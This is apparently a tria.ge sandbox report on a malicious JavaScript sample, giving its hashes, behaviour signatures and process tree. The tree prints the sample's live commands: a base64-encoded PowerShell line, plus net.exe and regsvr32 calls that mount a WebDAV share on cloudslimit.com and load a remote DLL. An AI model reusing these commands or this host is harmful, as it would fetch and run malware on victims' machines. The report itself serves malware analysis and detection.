Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
25/07/2024, 15:57
Static task
static1
Behavioral task
behavioral1
Sample
213911248442766951.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
213911248442766951.js
Resource
win10v2004-20240709-en
General
-
Target
213911248442766951.js
-
Size
19KB
-
MD5
5c2d257e51e5f6cb4ea13e803c140c6b
-
SHA1
081f1ae150c216471841da74da846eb1480ae271
-
SHA256
6e5c3fb55548ba47c94bda0ead0d360f889ddef72fa339309640cfc34f31a52b
-
SHA512
afe3a87c7e334fe2abb217ee9cf8cb02ccf36fdeeea223da51301d75883bf8b0a703ecfeece1f3ac8334ed135581efc98d033f17a8cfc126d09f05ed2b9ae25b
-
SSDEEP
384:lDuN6ZVSsdzKGvbPUf5tssFtcD2Yj6gzjNfAvM1PsUK3Z0jZe06iTmVFfKN6YjsW:puYZVSsdzKGvbsf5Pm
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2796 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2296 wrote to memory of 2796 2296 wscript.exe 30 PID 2296 wrote to memory of 2796 2296 wscript.exe 30 PID 2296 wrote to memory of 2796 2296 wscript.exe 30 PID 2796 wrote to memory of 2868 2796 powershell.exe 32 PID 2796 wrote to memory of 2868 2796 powershell.exe 32 PID 2796 wrote to memory of 2868 2796 powershell.exe 32 PID 2796 wrote to memory of 2916 2796 powershell.exe 33 PID 2796 wrote to memory of 2916 2796 powershell.exe 33 PID 2796 wrote to memory of 2916 2796 powershell.exe 33 PID 2796 wrote to memory of 2916 2796 powershell.exe 33 PID 2796 wrote to memory of 2916 2796 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\213911248442766951.js1⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA5ADEANwA2ADEAMgAwADcANQAxADEAMAA1ADEALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2868
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\91761207511051.dll3⤵PID:2916
-
-